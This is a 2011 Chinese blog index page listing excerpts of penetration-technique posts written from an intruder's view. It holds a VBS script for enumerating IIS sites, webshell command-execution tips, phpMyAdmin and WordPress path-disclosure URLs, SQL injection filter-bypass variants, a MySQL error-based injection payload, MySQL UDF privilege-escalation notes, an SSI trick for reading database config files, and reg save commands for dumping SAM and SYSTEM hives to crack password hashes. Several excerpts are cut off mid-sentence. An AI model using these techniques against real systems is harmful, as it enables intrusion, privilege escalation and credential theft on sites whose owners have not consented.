2011年3月27日

渗透技巧总结

摘要: 旁站路径问题1、读网站配置。2、用以下VBSOn Error Resume NextIf (LCase(Right(WScript.Fullname,11))="wscript.exe") ThenMsgbox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & "Usage:Cscript vWeb.vbs",4096,"Lilo"WScript.QuitEnd IfSet ObjS 阅读全文

posted @ 2011-03-27 23:22 =_=! 阅读(566) 评论(0) 推荐(0) 编辑

webshell下执行CMD的小技巧

摘要: 在webshell下执行CMD,按照常规,path:c:\\windows\\temp\\cmd.exe查用户Command: /c net user这个情况是system32目录的net.exe 你能调用到。要是调用不到,只能传文件到执行目录。假设更cmd在同一个目录,c:\\windows\\temp\\net.exe那就是c:\\windows\temp\net.exe user或者c:\windows\temp\net.exe "user"等等。可是有些服务器BT,后来,干脆吧path填netpath:C:\windows\temp\net.execommand: 阅读全文

posted @ 2011-03-27 22:05 =_=! 阅读(1006) 评论(0) 推荐(0) 编辑

SQL 中判断库站分离的技巧

摘要: 1.select @@servernameselect host_name()2.xp/2003系统下注册表里有个键值可以得到真实的ip地址 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\{FBD72F8D-6334-4739-957A-7D324D9C27EF}\Parameters\Tcpip ,在注册表的窗口右边就可发现“IPAddress”、“DefaultGateway”、“SubnetMask”等键值,它们分别对应本机当前配置的IP地址、网关及子网掩码等信息3.如果可以执行命令直接ipconfig /all 如果是内网,可以用xp 阅读全文

posted @ 2011-03-27 21:24 =_=! 阅读(928) 评论(0) 推荐(0) 编辑

4种伪静态注入方法讲解

摘要: 伪静态,主要是为了隐藏传递的参数名,伪静态只是一种URL重写的手段,既然能接受参数输入,所以并不能防止注入。目前来看,防止注入的最有效的方法就是使用LINQ。常规的伪静态页面如下:http://www.XXX.com/play/Diablo.html, 在看到之前先要确定这个页面是静态还是伪静态,鉴别方法很多。例如关联的动态页面是game.php ,那么当用户访问后程序会自动转换成类似http://www.XXX.com/game.php?action=play& name=Diablo 的形式,当然这部分是PHP执行的所以在访问时看不到。假如name=Diablo这个参数有注 阅读全文

posted @ 2011-03-27 04:14 =_=! 阅读(1687) 评论(0) 推荐(0) 编辑

php爆绝对路径的几种方法

摘要: WordPress的平台,爆绝对路径的方法是:url/wp-admin/includes/admin.phpurl/wp-content/plugins/akismet/akismet.phpurl/wp-content/plugins/akismet/hello.phpphpMyAdmin暴路径办法:phpMyAdmin/libraries/select_lang.lib.phpphpMyAdmin/darkblue_orange/layout.inc.phpphpMyAdmin/index.php?lang[]=1phpmyadmin/themes/darkblue_orange/layo 阅读全文

posted @ 2011-03-27 04:06 =_=! 阅读(387) 评论(0) 推荐(0) 编辑

SQL注入检测的各种变形

摘要: 空格的变形:+| %20 | 2个空格| tab | enter | Mysql,MSSQL,ACCESS/**/。 MSSQL字母的变形:大小写的转换。 Mysql,MSSQL,ACCESS通过类型转换修饰符N绕过:'1’=N’1 Mysql,MSSQL通过+号拆解字符串绕过:'abc’='a’%2B’bc’ MSSQL,ACCESS提交的时候加%: se%l%e%c%t Mysql,MSSQL,ACCESS双字节单引号绕过:%99’ or 1=1+--+ Mysql,魔法引号打开用版本选择符号绕过IDS:/*!select 1,2,3*/ Mysql注释符:+--+ 阅读全文

posted @ 2011-03-27 03:53 =_=! 阅读(288) 评论(0) 推荐(0) 编辑

mysql错误信息爆表

摘要: 注入代码:and exists(SELECT 1 FROM (select count(*),count(*),concat(floor(rand(0)*2),(select xxx from xxxx limit 2100,1))a from xxxx group by a)b)/* 阅读全文

posted @ 2011-03-27 03:51 =_=! 阅读(126) 评论(0) 推荐(0) 编辑

mysql提权提示can't open shared library 'udf.dll'解决办法

摘要: 对于can't open shared library 'udf.dll'相信很多使用mysql提权的朋友应该都不会感到陌生吧,明明是root用户 但是在使用udf.dll提权创建自定义函数时却提示这样的错误,以前遇到这种情况一般都会放弃。 经过测试发现appserv搭建php环境能利用udf.dll提权 5.037apache+php+mysql+phpmyadmin搭建的php环境不能利用 5.1为什么两个系统一个能利用一个不能利用呢?原因很简单 因为 5.1版本开始必须把udf.dll文件放到mysql安装目录下的lib/blugin文件下才能创建自定义函数,并且 阅读全文

posted @ 2011-03-27 03:49 =_=! 阅读(2596) 评论(0) 推荐(0) 编辑

当网站不能上传asp,asa时

摘要: 当网站不允许上传asp cer cdx htr等文件时, 上传一个stm文件, 内容为:<!--#include file="conn.asp"-->直接请求这个stm文件, conn.asp就一览无遗, 数据库路径也就到手啦! 并且又看了那篇shtml的介绍后,恍然大悟,终于明白了!原来就是如上所说的,<!--#include file="conn.asp"-->就是一条SSI指令,其作用是将"info.htm"的内容拷贝到当前的页面中,当访问者来浏览时,会看到其它HTML文档一样显示info.htm其中的内 阅读全文

posted @ 2011-03-27 03:02 =_=! 阅读(194) 评论(0) 推荐(0) 编辑

Windows server 2003抓HASH

摘要: 传wce.exe 抓hash 没有任何结果又传了Pwdump gethashes等。都没有抓到任何数据!最后用reg save hklm\sam c:\sam.hivereg save hklm\system c:\system.hivereg save hklm\security c:\security.hive导出文件然后在cain能够找到hash 阅读全文

posted @ 2011-03-27 02:56 =_=! 阅读(385) 评论(0) 推荐(0) 编辑

Apache 全路径

摘要: 最常用的Apache路径有:/etc/httpd/conf/httpd.conf/usr/local/apache/conf/httpd.conf/usr/local/apache2/conf/httpd.confApache 2.2 default layout (apache.org source package):ServerRoot :: /usr/local/apache2DocumentRoot :: /usr/local/apache2/htdocsApache Config File :: /usr/local/apache2/conf/httpd.confOther Conf 阅读全文

posted @ 2011-03-27 02:51 =_=! 阅读(354) 评论(0) 推荐(0) 编辑

导航